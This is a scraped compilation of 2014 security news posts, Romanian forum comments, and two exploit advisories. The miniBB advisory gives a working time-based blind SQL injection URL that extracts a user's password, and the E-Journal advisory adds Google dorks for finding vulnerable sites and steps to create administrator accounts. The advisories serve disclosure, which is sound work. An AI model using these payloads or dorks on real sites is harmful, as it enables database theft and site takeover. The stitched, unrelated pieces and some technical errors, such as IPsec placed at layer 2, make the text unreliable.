Aerosol

Introduction A VPN (Virtual Private Network) enables connections between clients and servers from multiple different internal networks across a public network (like the Internet) as if the nodes were located in the same private network. Since the communication is transferred across the public network, it must be properly encrypted to prevent eavesdropping. When a user is connected to the VPN connection, he/she can access the extended network services the same way as if they were located with its private network. There are two types of VPNs: the remote-access VPN used to connect a device to a network and site-to-site VPN used when connecting two networks together. A VPN can be used for multiple different scenarios, like allowing employees to securely access the company’s internal network even when outside the office (remote-access VPN), connecting two remote offices together into one internal private network (site-to-site VPN), etc. There are different implementations of the VPN protocols, including the ones listed below (summarized after [1]): Internet Protocol Security (IPsec): a widely used VPN implementation that uses IPv4 and operates on layer 2, where the packet is encapsulated into an IPsec header and sent to its endpoint. Transport Layer Security (SSL/TLS): another widely used VPN implementation that’s most often incorporated with OpenVPN, which we’ll take a look in this article. OpenVPN is an SSL-based VPN that uses SSL certificates to encrypt the data in transit. Datagram Transport Layer Security (DTLS) Microsoft Point-to-Point Encryption (MPPE) Microsoft Secure Socket Tunneling Protocol (SSTP) Secure Shell (SSH) VPN Pentesting OpenVPN Depending on the type of VPN we’re checking during our penetration test, there are different procedures that will drive our testing. Despite the type of VPN being used, the basic steps to pentest the VPN are the following: Reconnaissance: the first step is determining which type of VPN we’re dealing with in order to plan how to proceed with the attack. We can do that with a simple port scan by using an open-source tool like Nmap or any other tool with port scanning capabilities. The purpose is determining the type of VPN implementation we’re dealing with, which is often bound to a default port. Usually the following ports are involved with VPN services: UDP 500 (IPSec), TCP 1723, TCP 443 (SSL VPN) and UDP 1194 (OpenVPN). Exploitation: the phase is under direct influence of the type of the VPN we’re dealing with. When testing network-based IPSec VPN, we can rely on the Ike-scan program to perform the testing. First, we can identify the VPN product and its version and search for related vulnerabilities online; there are vulnerabilities for different vendors like Cisco or CheckPoint regarding the VPN services that we can use to our advantage. When dealing with SSL VPN, we could theoretically use the tools used for SSL pentesting, and in some cases we can do that, but most tools out there support TCP protocol only, where UDP isn’t supported. One of the most critical vulnerabilities this year has been the HeartBleed vulnerability, which affects the OpenSSL library that OpenVPN is also using. Therefore, if OpenVPN is using a vulnerable version of the OpenSSL library, the service can be exploited by malicious attackers and the whole server can be compromised. This is why we have to take every security precaution in order to protect our network. Credentials: when the connection with a VPN server is initiated, a client must present a valid passphrase or a certificate to prove that it’s authorized to use the server. If the VPN server is only using passphrases, we should instead configure to use certificates with each of the passphrases to improve security. I’ve often seen a VPN server using only user credentials to authenticate to the VPN server; not to mention some of the user passwords were quite simple and easy to guess within a few bruteforcing attempts. That is certainly something we have to keep in mind when conducting a penetration test of the VPN server or when setting up such a server for our own network. Recommendations for Hardening OpenVPN To harden the OpenVPN security, we have to edit its configuration file, usually passed to the OpenVPN daemon by the –config command-line option. If we use the “ps -ef” command and grep the OpenVPN processes, we can see where the configuration file is located and view it accordingly. Table 1: Security configuration options in openvpn.conf Conclusion It goes without saying that when a hacker stumbles upon an open VPN port, he will most likely check it for different security holes. Therefore, we have to properly protect our VPN server in order to secure our users and our whole internal network. If an attacker is able to compromise the VPN service, he can get access to our whole network. Some of the administrators might argue that the VPN service is very secure by itself and needs no additional protection, but such predictions have been proved incorrect in the past. One such vulnerability was found in April 2014, named the HeartBleed vulnerability, which can be used to dump memory from the OpenVPN daemon process. Therefore, if an attacker is able to determine that VPN service is running on some port, he might be able to dump arbitrary memory from the server or possibly even take control of the server. Once such a vulnerability is discovered, we must patch it as soon as possible, but properly a hardened service should give an attacker as little access to the server as possible. Imagine a new devastating vulnerability being found in OpenVPN/OpenSSL in the future; a secure service running under an unprivileged account might be just what you need to protect yourself from being a victim of cyber attack. References [1] Virtual private network, https://en.wikipedia.org/wiki/Virtual_private_network. [2] Hardening OpenVPN Security, https://openvpn.net/index.php/open-source/documentation/howto.html#security. Source

Developers running the open source Git code-repository software and tools, like GitHub, on Mac OS X and Windows computers are highly being recommended to install a security update that patches a major security vulnerability in Git clients that leverages an attacker to hijack end-user computers. The critical Git vulnerability affects all versions of the official Git client and all the related software that interacts with Git repositories, including GitHub for Windows and Mac OS X, according to a GitHub advisory published Thursday. HOW GIT BUG WORKS The vulnerability allows an attacker to execute remote code on a client’s computer when the client software accesses Git repositories. The GitHub engineering team gave a detailed explanation on how attackers might exploit the vulnerability: PATCH RELEASED However, the advisory didn’t state if the vulnerability is being or has been exploited in wild by the hackers, but it confirmed that GitHub for Windows and GitHub for Mac are both affected and should be updated as immediately as possible. GITHUB REPOSITORIES ARE SAFE Developers using GitHub’s client for Windows or Mac can download Git version 2.2.1, a maintenance release that includes a security fix for a critical vulnerability, and it requires a client update to be fully addressed. The security update also includes new releases with the same security fix for older versions of the Git command-line client. Since, repositories on Github verifies and blocks malicious contents during its verification process, therefore repositories on github.com are protected. But, it is not necessary that other sites hosting repositories provide the same security measures, so all Git users are recommended to upgrade immediately. DOWNLOAD NOW Check out the Git version 2.2.1 release for further information on the security fixes. Updated version of GitHub for Windows are available here and GitHub for Mac are available here for immediate download. Git is a revision control system, and GitHub is a hosting service for Git repositories, both are widely used to collaborate on open-source projects and for proprietary software that different companies build and maintain. Source

Security researchers have discovered a massive security flaw that could let hackers and cybercriminals listen to private phone calls and read text messages on a potentially vast scale – no matter if the cellular networks use the latest and most advanced encryption available. The critical flaw lies in the global telecom network known as Signal System 7 that powers multiple phone carriers across the world, including AT&T and Verizon, to route calls, texts and other services to each other. The vulnerability has been discovered by the German researchers who will present their findings at a hacker conference in Hamburg later this month. NUMBER OF SECURITY FLAWS IN SS7 SS7 or Signaling System Number 7 is a protocol suite used by most telecommunications operators throughout the world to communicate with one another when directing calls, texts and Internet data. It allows cell phone carriers to collect location information from cell phone towers and share it with each other. A United States carrier will find its customer, no matter if he or she travels to any other country. According to the security researchers, the outdated infrastructure of the SS7 makes it very easy for hackers to hack, as it is loaded with some serious security vulnerabilities which can lead to huge invasions of privacy of the billions of cellular customers worldwide. BACKDOOR OPEN FOR HACKERS So far, the extent of flaws exploited by hackers have not been revealed, but it is believed that using the flaws hackers can locate or redirect users' calls to themselves or anywhere in the world before forwarding to the intended recipient, listen to calls as they happen, and record hundreds of encrypted calls and texts at a time for later decryption. No matter how much strong or advanced encryption the carriers are using, for example AT&T and Verizon use 3G and 4G networks for calls, messages, and texts sent from people within the same network, but the use of that old and insecure SS7 for sending data across networks the backdoor open for hackers. Not just this, use of SS7 protocol also makes the potential to defraud users and cellular carriers, according to the researchers. ACLU – STOP USING TELEPHONE SERVICE, BUT WAIT!! IS THAT POSSIBLE? The American Civil Liberties Union (ACLU) has also warned people against using their handset in light of the breaches. Soghoian also believes that security agencies – like the United states' NSA and British security agency GCHQ – could be using these flaws. "Many of the big intelligence agencies probably have teams that do nothing but SS7 research and exploitation. They've likely sat on these things and quietly exploited them," he said. However, the poor security capabilities of SS7 protocol is not hidden from the people and its not at all a new, just three months ago we reported How a Cell Phone User Can be Secretly Tracked Across the Globe. But the era where each and every person care about privacy and security of their data, things like this really publicize exactly how big this threat really is and make many worried of its consequences. Source

# Exploit Title: miniBB 3.1 Blind SQL Injection # Date: 23-11-2014 # Software Link: http://www.minibb.com/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # CVE: CVE-2014-9254 # Category: webapps 1. Description preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp). File: bb_func_unsub.php $usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0); $allowUnsub=FALSE; $chkCode=FALSE; if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){ //trying to unsubscribe directly from email $chkField='email_code'; $chkVal=$_GET['code']; $userCondition=TRUE; $chkCode=TRUE; } else{ //manual unsubsribe $chkField='user_id'; $chkVal=$user_id; $userCondition=($usrid==$user_id); } if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal)) http://security.szurek.pl/minibb-31-blind-sql-injection.html 2. Proof of Concept http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != ' This SQL will check if first password character user ID=1 is c. If yes, it will sleep 5 seconds. 3. Solution: http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html Source

Hostinger

Frate comunismul nu a disparut niciodata doar a fost "ascuns"... cuvantul "PRIVAT" nu isi are loc aici...

Samy Kamkar has a special talent for turning seemingly innocuous things into rather terrifying attack tools. First it was an inexpensive drone that Kamkar turned into a flying hacking platform with his Skyjack research, and now it’s a $20 USB microcontroller that Kamkar has loaded with code that can install a backdoor on a target machine in a few seconds and hand control of it to the attacker. Kamkar has been working on the new project for some time, looking for a way to install the backdoor without needing to use the mouse and keyboard. The solution he came up with is elegant, fast and effective. By using code that can emulate the keyboard and the mouse and evade the security protections such as local firewalls, Kamkar found a method to install his backdoor in just a couple of seconds and keep it hidden on the machine. He loaded the code onto an inexpensive Teensy USB microcontroller. Kamkar said the stickiest problem with the whole thing was figuring out how to move various windows around on the screen without the mouse. “The fun applications are when you can mount an attack pretty simply,” Kamkar said in an interview. “In general, it’s a pretty simple attack. Figuring out how to move things took the most time.” The USBdriveby attack Kamkar devised is somewhat similar to the work done by Karsten Nohl and Jacob Lell on the BadUSB attack. But Kamkar said he had done nearly all of the work on his code before Nohl and Lell disclosed their findings at Black Hat this summer. “Karsten’s attack is much more sophisticated. He’s rewriting the flash memory on the USB,” Kamkar said. “The way he’s adjusting the network preferences is by emulating a network device.” In both cases, the attack takes advantage of the trust that computers have in any USB device that’s inserted. Kamkar’s USBdriveby attack can be executed in a matter of seconds and would be quite difficult for a typical user to detect once it’s executed. In a demo video, Kamkar runs the attack on OS X, but he said the code, which he’s released on GitHub, can be modified easily to run on Windows or Linux machine. The attack inserts a backdoor on the target machine and also overwrites the DNS settings so that the attacker can then spoof various destinations, such as Facebook or an online banking site, and collect usernames and passwords. The backdoor also goes into the cron queue, so that it runs at specified intervals. “In the video, I slow it down quite a bit, but it could be done in a few seconds. The terminal backdoor could be done in a second. You don’t want to send more than sixty characters a second. To an average user, I don’t think they’d find it. You could look in the cron tab and find the backdoor. But if someone modifies it, then maybe not,” he said. A forensics person would find it, but I don’t know if I’d even notice if you did it to my machine.” Kamkar is hopeful that other researchers will look at his code and build on it, looking for other uses for it. “It would be cool if people came up with different attack vectors, maybe have it read an address book or something, especially if they can escalate privileges,” he said. “A lot of people don’t think that it will work if they’re not logged in as an admin. But all I need to do is plant this, and it’s still listening. So if you go in as a normal user and escalate privileges to admin, then I have that.” Source

SECURITY RESEARCHERS are making use of quantum physics to create fraud-proof credit cards. Called Quantum-Secure Authentication (QSA), the technology means hackers cannot determine what the information is. It centres on single particles of light, or photons, and their ability to encode data and exploits a property of photons that allows them to effectively be in multiple places at once, a phenomenon described in quantum physics. "We experimentally demonstrate quantum-secure authentication (QSA) of a classical multiple-scattering key. The key is authenticated by illuminating it with a light pulse containing fewer photons than spatial degrees of freedom and verifying the spatial shape of the reflected light," explained the researchers in an Optica journal. Quantum-physical principles forbid an attacker from beign able to discern the incident light pulse so that they cannot emulate the key by digitally constructing the expected optical response, even if all information about the key is publicly known. The researchers explained that QSA uses a key that cannot be copied due to "technological limitations" and is also secure against digital emulation. It also does not depend on secrecy of stored data, nor upon unproven mathematical assumptions, being relatively simple to implement with current technology, the security experts claimed. Malwarebytes's head of malware intelligence, Adam Kujawa, said that while the Database could be hacked and the pairs could be stolen, the keys would not be in a form that could be digitally reproduced and therefore, virtually useless to the attacker. "The problem is that even if the attacker were to obtain a correct challenge response, for a single challenge, it would be impossible for them to recreate that response in a way that would authenticate due to the properties of Quantum Physics," Kujawa said. "In addition, they would need to know that the challenge response would be used again in a lock that has dynamically generated keyholes." Kujawa explained that the amount of effort required to ensure that any key would make it through authentication for a single QSA would require numerous tries and having access to both the client and server, something like that would throw flags faster than a working key could be calculated. "Authentication at that point would be impossible," he added, suggesting that this technology could mean a future of truly secure data. Source

The latest evolution of the online bank account raiding Trojan ZeuS is the webcam-spying Chthonic malware, according to researchers. Chthonic infects Windows PCs, and allows criminals to connect to the compromised PC remotely and command it to carry out fraudulent transactions. The software nasty is targeting customers of more than 150 banks and 20 payment systems in 15 countries. Financial institutions in the UK, Spain, the US, Russia, Japan and Italy are among the most heavily targeted banks. Security researchers at Kaspersky Lab save the theftware is an evolution of ZeuS. Chthonic’s main weapon is web injectors: it inserts its own malicious JavaScript code and images into an online bank's pages when fetched by the web browser on an owned Windows PC. These modifications intercept the victim’s phone number, one-time passwords and PINs, and any other sensitive information typed in by the user, and sends it off to fraudsters. In the case of one of the Japanese banks targeted, Chthonic was able to hide the bank’s warnings about malware, and instead inject a script that allows attackers to carry out various transactions using the victim’s account. Elsewhere, affected customers of Russian banks are greeted by a completely fraudulent banking site as soon as they enter their login details. The trojan creates an iFrame with a counterfeit copy of the website that has the same size as the original window. Fortunately, many code fragments used by Chthonic to perform web injections can no longer be used, because banks have changed the structure of their pages and in some cases, the domains as well. Victims are infected through web links or by email attachments carrying a booby-trapped document that exploits a bug in Microsoft's Word software to execute malicious code. “The attachment contains a specially crafted RTF document, designed to exploit the CVE-2014-1761 vulnerability in Microsoft Office products,” Kaspersky Lab explains. Once downloaded and running, the malicious code, which contains an encrypted configuration file, injects itself into a msiexec process, and a number of malicious modules are unpacked and installed on the machines. Analysis is ongoing, but so far Kaspersky Lab researchers have discovered modules that can collect system information, steal saved passwords, log keystrokes, enable remote access, and record video and sound through any installed web camera and microphone. “The discovery of Chthonic confirms that the ZeuS Trojan is still actively evolving,” said Yury Namestnikov, senior malware analyst at Kaspersky Lab and one of the researchers who investigated the threat. “Malware writers are making full use of the latest techniques, helped considerably by the leak of the ZeuS source code.” “Chthonic is the next phase in the evolution of ZeuS. It uses Zeus AES encryption, a virtual machine similar to that used by ZeusVM and KINS, and the Andromeda downloader – to target ever more financial institutions and innocent customers in ever more sophisticated ways,’ he added. Namestnikov warned that more new variants of ZeuS are likely. More technical details on Chthonic can be found in a post on Kaspersky’s official Securelist blog here. Source

A dispute has arisen about the seriousness of a vulnerability in Linux, dubbed "Grinch", that supposedly creates a privilege escalation risk. The flaw resides in the Linux authorisation system, which can unintentionally allow privilege escalation, granting a user “root", or full administrative, access. “With full root access, an attacker would be able to completely control a system, including the ability to install programs, read data, and use the machine as a launching point for compromising other systems,” Alert Logic warns. Alert Logic warns that the “grinch”1 bug impacts all Linux platforms, including mobile devices. Alert Logic admits it has NOT seen any exploits that harness this vulnerability. Other security firms believe Alert Logic is overstating the risk, which Trend Micro characterises as “limited”. The scope of this vulnerability is very limited. Grinch is not remotely exploitable; it requires that an attacker have physical access the server they want to attack. In addition, the attacker must already have access to an account in the wheels group (i.e., already have elevated privileges as local administrators), polkit [toolkit for privilege authorisation] must be installed, and the PackageKit package management system must be in use. The barriers to exploitation are significant; in a very real way to exploit this flaw you must already have very high levels of access, making exploiting this “vulnerability” unnecessary. SANS describes it as more a “common overly permissive configuration of many Linux systems”. Red Hat dismisses the flaw entirely as “expected behavior“. An independent researcher first posted about the vulnerability – which he called PackageKit Privilege Escalation – almost a month ago before Alert Logic picked up on the threat and publicised it. ® Bootnote 1The bug was named after the famous Dr Seuss character, since it supposedly carries the potential to ruin the season of network administrators. Source

US software giant Microsoft is suing alleged scammers who phone people pretending to represent the firm and offer bogus technology support. The callers ask to take over a home computer and demand money to fix it. Some then install viruses as well. The software company said it had received more than 65,000 complaints about tech support scams since May. It is taking legal action against several firms it accuses of misusing its name in such cases. Fake ads The scam has been around for decades with callers peddling useless security software and tricking people into spending hundreds of pounds (or dollars) to solve non-existent computer problems. Increasingly, the bogus technicians are gaining access to people's computers remotely. From there they can also steal personal and financial information and install malware. In some cases people are tricked into signing up for support via fake web ads. Others receive a direct telephone call from a technician claiming to represent Microsoft. Microsoft has warned that scammers are likely to be active over the Christmas period. "The holiday season is a popular time for scammers as more people engage in online activities, including shopping, donating to charity and searching for travel deals," it said. Older victims Older people needed to be particularly vigilant, it said. "Tech support scammers don't discriminate; they will go after anyone, but not surprisingly senior citizens have been among the most vulnerable." The US Federal Trade Commission filed a legal case in Florida last month against a company that used adverts to scare people into believing their computer had a virus and then sell them allegedly worthless services. In the UK Trading Standards has recently taken legal action against a man from Luton who hired people at an Indian call centre to falsely tell people their computers had a serious problem. Mohammed Khalid Jamil was given a four-month suspended jail sentence and ordered to pay £5,665 compensation and £13,929 in prosecution costs. Microsoft has issued tips to help users avoid falling for such scams. It says: Ask if there is a fee or subscription for the services. If there is, hang up Never give control of your computer to the third party unless you can confirm it is a legitimate representative of a computer support team at a company of which you are already a customer Take the caller's information down and immediately report it to your local authorities Never provide your credit card or financial information to someone claiming to be from Microsoft tech support. Source

man am citit si asta reiese din prima parte in fine, sunt pe linux o sa le ia ceva timp sa imi gaseasca cmd-ul ) edit: https://rstforums.com/forum/94061-mo-cr-ciun-ne-aduce-calul-troian-securismul-cibernetic.rst acum am inteles tot.

Sunt si din RO probabil... scopul? vezi ce fac altii

tocmai asta au zis coaie, NU MAI AU NEVOIE DE MANDAT.

Nu bre, au voie sa iti controleze prin pc ( sa caute poze cu tine si iubita in ipostaze intime de exemplu) nu mai au nevoie de mandat, preactic spionare legala.

Buna si bine ai venit!

Inca o data guvernul a dat "mue" oamenilor cu o lege stupid de idioata... Oricum, noroc ca nu sunt pregatiti din punct de vedere tehnic ( cum spune si @Nytro ) (o sa ii il urmareasca pe vecinu' Costica cum se labareste pe brazzers...) Muie antena 3

The United States government is expected to attribute the damaging and embarrassing hack of Sony Pictures Entertainment to the government of North Korea. Various mainstream media outlets quoting anonymous government sources said North Korea is “centrally involved” in the attack, which NBC News said was carried out by hackers outside the isolated country on the orders of the North Korean government. It’s unknown what evidence the U.S. government has linking the Sony hack to North Korea, nor how said evidence was obtained. It’s likely the U.S. won’t give much in the way of details in this regard without sharing insight into what are likely classified activities, security experts said. Another big unknown is how the U.S. will respond against a nation already under heavy economic sanctions. The Washington Post reports the White House has not determined a course of action, which will delay a public announcement. The public narrative in terms of motivation has been the Sony-produced comedy movie The Interview which depicts a plot to assassinate North Korean leader Kim Jong Un. A North Korean spokesman called the movie a “blatant act of terrorism and war,” leading to initial speculation the country was behind the attack on Sony, which yesterday canceled the movie’s scheduled Christmas Day release. Sony’s announcement came after leading theater chains said they would not run the movie after threats from the Guardians of Peace hacker group claiming responsibility for the hacks, which said that it would generate a 9/11-style response against the premiere and theaters showing the movie. The movie, however, could be a massive red herring. The attackers not only allegedly made off with terabytes of data that included private emails from top executives and celebrities, but also intellectual property ranging from unreleased movies made available for download, to scripts of upcoming potential blockbusters put online, in addition to employees’ personal information. They also covered their tracks by unleashing wiper malware that overwrote hard drives company-wide, malware that was also used in the DarkSeoul attacks in South Korea that were attributed to the North, as well as the Saudi Aramco Shamoon attacks attributed to Iran. Could this just be a rogue country demonstrating its capabilities and proving that it can operate on a somewhat level playing field with a world power? “It’s not about a movie or even Sony, at all,” wrote Immunity CEO and former NSA scientist Dave Aitel on the Daily Dave mailing list. “When you build a nuclear program, you have to explode at least one warhead so that other countries see that you can do it. The same is true with Cyber.” Aitel was one of the first to publicly theorize that North Korea was behind the Sony hack and likened it to Iran’s alleged involvement in the Shamoon attacks that destroyed 30,000 workstations at the Saudi state-run oil manufacture. “Iran did this exact same near-mortal blow to Saudi Aramco, as a way of demonstrating that they could and would,” Aitel said. “That’s what just happened to Sony, but they didn’t see it in time, and didn’t realize they were going to have to fold. If you recognize the signature of this kind of nation-state attack, it is not hard to see ahead of time what is going to happen. “Clearly, not all hacking (even very impactful hacking) by random hacker groups is war/terrorism,” Aitel continued. “But when a nation state decides to take out a business in another country, it’s hard for our policy team to find another word for it.” While attribution is difficult in any hack, analysis of the Destover wiper malware has been conclusive in linking it to the three most public, destructive attacks on record. Kaspersky Lab senior researcher Kurt Baumgartner published a report on Dec. 4 analyzing the similarities in the Shamoon, DarkSeoul and Sony hacks. Across the three attacks, Baumgartner notes the use of commercially available Eldos RawDisk driver files (Shamoon and Destover), that wiper drivers are maintained in the dropper’s resource section (Shamoon, Destover), and disk data and the master boot record are overwritten with encoded political messages (Shamoon, DarkSeoul). “In all three cases: Shamoon, DarkSeoul and Destover, the groups claiming credit for their destructive impact across entire large networks had no history or real identity of their own,” Baumgartner wrote in a report published on Securelist. “All attempted to disappear following their act, did not make clear statements but did make bizarre and roundabout accusations of criminal conduct, and instigated their destructive acts immediately after a politically-charged event that was suggested as having been at the heart of the matter.” Cisco’s Talos research team published its own report yesterday, warning future victims that backup is an essential protective measure in such attacks. The Talos report dives into the technical aspects of wiper malware and how to detect it. Source

More than 12 million devices running an embedded webserver called RomPager are vulnerable to a simple attack that could give a hacker man-in-the-middle position on traffic going to and from home routers from just about every leading manufacturer. Mostly ISP-owned residential gateways manufactured by D-Link, Huawei, TP-Link, ZTE, Zyxel and several others are currently exposed. Researchers at Check Point Software Technologies reported the flaw they’ve called Misfortune Cookie, to all of the affected vendors and manufacturers, and most have responded that they will push new firmware and patches in short order. The problem with embedded device security is that, with consumer-owned gear especially, it’s up to the device owner to find and flash new firmware, leaving most of the devices in question vulnerable indefinitely. In the case of the RomPager vulnerability, an attacker need only send a single packet containing a malicious HTTP cookie to exploit the flaw. Such an exploit would corrupt memory on the device and allow an attacker to remotely gain administrative access to the device. “We hope this is a game-changing wake-up call,” said Shahar Tal, malware and vulnerability research manager with Check Point. “Certainly in terms of numbers, I don’t remember a vulnerability released that had 12 million endpoints online since maybe Conficker in 2008. This is really, really bad and the incredibly slow update propagation chain makes it worse.” Tal said the vulnerable code was written in 2002 and given to chipset makers bundled in a software development kit (SDK). This SDK was given to manufacturers who used it when building their respective firmware; ISPs, Tal said, also used the same SDK to prepare custom firmware used in consumer residential devices. “The vulnerable code is from 2002 and was actually fixed in 2005 [by AllegroSoft, makers of RomPager] and yet still did not make it into consumer devices,” Tal said. “It’s present in device firmware manufactured in 2014 that we downloaded last month. This is an industry problem; something is wrong.” Tal said Check Point conducted Internet scans that show the 12 million devices exposed online in 189 countries. In some of those countries, Tal said, vulnerability rates hover around 10 percent, and in one country half of its Internet users are at risk. “Even when people become aware of this, I don’t expect updated firmware to be deployed in 189 countries,” Tal said. “This will be with us for months and years to come.” That means that vulnerable home routers are at risk to remote attacks that put not only Internet traffic at risk, but also other devices on a local network such as printers. “The implications of these risks mean more than just a privacy violation – they also set the stage for further attacks, such as installing malware on devices and making permanent configuration changes,” Check Point wrote in an analysis published today. “This WAN-to-LAN free-crossing is also bypassing any firewall or isolation functionality previously provided by your gateway and breaks common threat models. For example, an attacker can try to access your home webcam (potentially using default credentials) or extract data from your business NAS backup drive.” Tal said Check Point is not aware of any exploits of this issue, but assumes that researchers and black hats will soon begin pinging Shodan and doing Google searches looking for vulnerable devices. “This is very easy to exploit once you figure out the program internals,” Tal said. “We are assuming that some researchers will do that in upcoming days and we hope vendors react as fast as possible to get consumers protected.” Some vendors, which Tal would not name, have already shared beta versions of upgraded firmware with Check Point, and Check Point has confirmed the issue as patched in those cases. “Everyone is aware that embedded devices are insecure, but we haven’t had one game-changing event that crosses boundaries and makes the industry understand this,” Tal said. “This one is definitely worth the attention and needs fixing.” Source

Document Title: =============== E-Journal CMS (ID) - Multiple Web Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1380 Release Date: ============= 2014-12-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1380 Common Vulnerability Scoring System: ==================================== 7 Product & Service Introduction: =============================== http://simlitabmas.dikti.go.id/ejournal/ Abstract Advisory Information: ============================== An independent Vulnerability Laboratory Researcher discovered multiple vulnerabilities in the indonesian E-Journal web-application. Vulnerability Disclosure Timeline: ================================== 2013-12-17: Public Disclosure Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ 1.1 A sql injection web vulnerability has been discovered in the official E-Journal (ID) content management system. The vulnerability allows remote attackers to execute own sql commands by usage of a vulnerable serivce value. The vulnerability is located in the id value of the jurnal.php file. Remote attackers are able to execute own sql commands by usage of a GET method request with manipulated id value. Remote attackers are able to read database information by execution of own sql commands. The vulnerability is located in the client-side and the request method to execute sql commands is GET. The security risk of the sql vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0. Exploitation of the sql injection web vulnerability does not require a privileged application user account or user interaction. Successful exploitation of the remote vulnerability results in database management system and web-application compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] jurnal Vulnerable File(s): [+] jurnal.php Vulnerable Parameter(s): [+] id 1.2 A privilege escalation vulnerability has been discovered in the official E-Journal (ID) content management system. The vulnerability allows an attacker to escalate of the restricted privileges, to gain for example higher access controls. The privilege escalation vulnerability is located in tambah value of the URL input in the data.php file. Remote attackers can switch the menu to escalte with privileges by adding a new administrator account. The vulnerability is located on the application-side and the request method to inject is POST. The security risk of the privilege escalation vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the privilege escalation web vulnerability requires a low privileged application user account and no user interaction. Successful exploitation of the remote vulnerability results in information leaking, database management system- and web-application -compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] URL Vulnerable File(s): [+] data.php Vulnerable Parameter(s): [+] tambah Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by remote attackers without privileged application user account and user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Dork(s): inurl:mahasiswa.php intitle:E-Journal inurl:dosen.php intitle:E-Journal inurl:jurnal.php intitle:E-Journal inurl:dokumen.php intitle:E-Journal "Karya Tulis Mahasiswa" intitle:E-Journal "Design & Programming by" intitle:E-Journal "E-Journal adalah aplikasi berbasis web untuk" Or use your own Google Dorks Note: This E-Journal CMS has 2 versions, The Old Version doesn't have informasi.php (Informasi Menu). 1.1 POC#1: SQL Injection http://[Site]/[Path]/jurnal.php?detail=jurnal&id=-'[SQL-INJECTION VULNERABILITY]-- Reference Url(s): http://e-journal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]-- http://www.ejournal-xxx.com/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]-- http://e-journal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]-- http://ejurnal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]-- http://ejournal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]-- 1.2 PoC#2: Privilege Escalation You can create a new administrator account by usage of the following trick. For Example my Target url is : http://www.ejournal-xxx.com/ Step1: Add data.php?tambah=dosen in the URL. So in this case the URL was http://www.ejournal-xxx.com/data.php?tambah=dosen Step2: Then you can see this notice : "ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR". Ignore that Notice and click Admin Menu. Screenshot #1 : http://i59.tinypic.com/54he2b.png Step3: Successful exploited! Now you can add an Administrator Account. Screenshot #2 : http://i59.tinypic.com/2i8vyus.png Solution - Fix & Patch: ======================= 1.1 The vulnerability can be patched by usage of a prepared statement. Encode and parse the vulnerable id value in the jurnal.php file to prevent sql injection attacks. 1.2 Restrict the URL parameter input to prevent unauthorized account adds. Parse the URL value and encode the input restrict the url to a local source. Security Risk: ============== 1.1 The security risk of the remote sql injection web vulnerability in the e-journal application is estimated as high. (CVSS 7.0) 1.2 The security risk of the privilege escalation web vulnerability in the URL parameter is estimated as high. (CVSS 6.9) Credits & Authors: ================== X-Cisadane - Stefanus (steevee.aka@gmail.com) Greetz to: X-Code YogyaFree, Explore Crew, CodeNesia, Bogor Hackers Community, Tomi Zaoldyeck and Winda Utari Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

